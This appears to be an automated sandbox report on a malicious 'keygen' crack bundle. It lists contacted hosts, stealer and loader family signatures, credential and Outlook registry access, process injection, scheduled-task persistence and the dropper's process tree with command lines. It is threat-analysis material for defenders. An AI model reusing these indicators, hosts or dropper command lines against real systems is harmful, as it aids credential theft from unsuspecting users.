GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 104.26.2.46:443 iplogger.org tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 89.116.109.163:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.22:80 crl.microsoft.com tcp

Files

memory/2192-0-0x00000000000F0000-0x0000000000108000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-08 22:29

Reported

2024-11-08 22:32

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Pony family

pony

Pony,Fareit

rat spyware stealer pony

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4508 set thread context of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4492 set thread context of 3192 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\RarSFX1\f2217e5f.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\ss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 720 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3080 wrote to memory of 3092 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3092 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3080 wrote to memory of 1476 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2340 wrote to memory of 4508 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 4508 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 2112 wrote to memory of 4808 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 1476 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe
PID 4644 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 4644 wrote to memory of 2660 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\chrome3.exe
PID 4644 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 4644 wrote to memory of 2292 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe
PID 4644 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 4644 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\2.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 4388 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 4644 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 4644 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX1\PBrowFile28.exe C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 2788 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe C:\Windows\SysWOW64\cmd.exe
PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 1476 wrote to memory of 3192 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\md1_1eaf.exe
PID 2716 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2716 wrote to memory of 1508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe

keygen-pr.exe -p83fsase3Ge

C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe

keygen-step-1.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

keygen-step-6.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe

keygen-step-3.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe

keygen-step-4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe" 1731104981 0

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe -txt -scanlocal -file:potato.dat

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Crack.exe

